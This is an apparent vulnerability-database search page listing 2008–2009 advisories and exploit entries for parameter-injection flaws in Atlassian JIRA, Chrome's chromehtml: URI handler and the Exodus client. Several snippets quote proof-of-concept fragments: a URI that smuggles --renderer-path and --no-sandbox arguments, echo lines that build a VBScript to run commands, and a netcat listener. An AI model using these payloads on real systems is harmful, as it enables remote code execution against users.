Lucene search
K

925 matches found

Prion
Prion
added 2009/03/26 9:0 p.m.21 views

Design/Logic Flaw

The WebWork 1 web application framework in Atlassian JIRA before 3.13.2 allows remote attackers to invoke exposed public JIRA methods via a crafted URL that is dynamically transformed into method calls, aka "WebWork 1 Parameter Injection Hole."...

6.8CVSS7.5AI score0.01753EPSS
Exploits0References5Affected Software1
CVE
CVE
added 2009/03/26 8:28 p.m.49 views

CVE-2008-6531

Affected software: Atlassian Jira (

6.8CVSS7.1AI score0.01753EPSS
Exploits0References5Affected Software1
seebug.org
seebug.org
added 2009/02/02 12:0 a.m.10 views

Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC

No description provided by source. Try this: chromehtml:"%20--renderer-path="calc"%20--no-sandbox Disabling sandbox does matter : Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ... Full PoC: htmlheadtitleChrome URI Handler Remote Command Execution...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2009/01/31 12:0 a.m.24 views

Google Chrome code execution

chromehtml: URI parameter injection...

2.4AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2009/01/31 12:0 a.m.24 views

Re: Re: Google Chrome Browser (ChromeHTML://) remote parameter injection POC

Try this: chromehtml:"20--renderer-path="calc"20--no-sandbox Disabling sandbox does matter : Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ... Full PoC: htmlheadtitleChrome URI Handler Remote Command Execution PoC/title/head body h3This is a test/h3 iframe...

1.6AI score
Exploits0
0day.today
0day.today
added 2009/01/30 12:0 a.m.19 views

Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC

Exploit for unknown platform in category remote exploits ================================================================ Google Chrome 1.0.154.46 ChromeHTML:// Parameter Injection PoC ================================================================ Try this:...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2008/12/30 12:0 a.m.14 views

Google Chrome Parameter Injection

click me...

0.7AI score
Exploits0
seebug.org
seebug.org
added 2008/12/25 12:0 a.m.17 views

Internet Explorer 'chromeHTML://'命令行参数注入漏洞

BUGTRAQ ID: 32999 Internet Explorer是一款流行的WEB浏览器。 Internet Explorer不正确处理用户输入,远程攻击者可以利用漏洞通过协议处理器注入命令行参数,造成以登录用户上下文执行任意代码。 问题是处理'chromeHTML://'协议存在问题,构建恶意WEB页,诱使用户访问可触发此漏洞。 Microsoft Internet Explorer 8 beta 2 目前没有解决方案提供: http://www.microsoft.com/ie/ !-- Google Chrome Browser ChromeHTML:// remote...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2008/12/24 12:0 a.m.20 views

Google Chrome Browser (ChromeHTML://) Remote Parameter Injection

No description provided by source. !-- Google Chrome Browser ChromeHTML:// remote parameter injection POC by Nine:Situations:Group::bellick&strawdog Site: http://retrogod.altervista.org/ tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3 List of command...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2008/12/23 12:0 a.m.13 views

Google Chrome - ChromeHTML: Remote Parameter Injection

Google Chrome - ChromeHTML: Remote Parameter Injection click me milw0rm.com 2008-12-23...

0.8AI score
Exploits0
0day.today
0day.today
added 2008/12/23 12:0 a.m.17 views

Google Chrome Browser (ChromeHTML://) Remote Parameter Injection

Exploit for unknown platform in category remote exploits ================================================================ Google Chrome Browser ChromeHTML:// Remote Parameter Injection ================================================================ 0day.today 2018-03-01...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2008/12/23 12:0 a.m.49 views

Google Chrome - 'ChromeHTML://' Remote Parameter Injection

click me milw0rm.com 2008-12-23...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2008/11/22 12:0 a.m.16 views

Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit

No description provided by source. !-- Exodus v0.10 remote code execution exploit by Nine:Situations:Group::strawdog This uses the "-l" argument to overwrite a file inside Microsoft Help and Support Center folders oh rgod... Firstly run netcat in listen mode to drop the vbscript shell run this...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2008/11/20 12:0 a.m.15 views

Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)

Exodus 0.10 - URI Handler Arbitrary Parameter Injection 2 testfile echo Dim wshShell testfile echo Set wshShell = CreateObject"WScript.Shell" testfile echo wshShell.Run"cmd /c start calc" testfile echo ^ testfile nc -L -s 192.168.0.1 -p 5222 -vv click me click me milw0rm.com 2008-11-20...

0.9AI score
Exploits0
0day.today
0day.today
added 2008/11/20 12:0 a.m.59 views

Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit

Exploit for unknown platform in category remote exploits =============================================================== Exodus 0.10 uri handler Arbitrary Parameter Injection Exploit =============================================================== testfile echo Dim wshShell testfile echo Set...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2008/11/20 12:0 a.m.33 views

Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)

testfile echo Dim wshShell testfile echo Set wshShell = CreateObject"WScript.Shell" testfile echo wshShell.Run"cmd /c start calc" testfile echo ^ testfile nc -L -s 192.168.0.1 -p 5222 -vv click me click me milw0rm.com 2008-11-20...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2008/11/19 12:0 a.m.43 views

Exodus v0.10 uri handler arbitrary parameter injection

-------------------------------------------------------------------------------- Exodus v0.10 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems because of an installation bug...

0.2AI score
Exploits0
seebug.org
seebug.org
added 2008/11/18 12:0 a.m.18 views

Exodus 0.10 (uri handler) Arbitrary Parameter Injection Vulnerability

No description provided by source. -------------------------------------------------------------------------------- Exodus v0.10 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems because of an installati...

7.1AI score
Exploits0
0day.today
0day.today
added 2008/11/17 12:0 a.m.20 views

Exodus 0.10 (uri handler) Arbitrary Parameter Injection Vulnerability

Exploit for unknown platform in category remote exploits ===================================================================== Exodus 0.10 uri handler Arbitrary Parameter Injection Vulnerability =====================================================================...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2008/11/17 12:0 a.m.22 views

Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)

Exodus 0.10 - URI Handler Arbitrary Parameter Injection 1 -------------------------------------------------------------------------------- Exodus v0.10 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems...

0.8AI score
Exploits0
Rows per page
Query Builder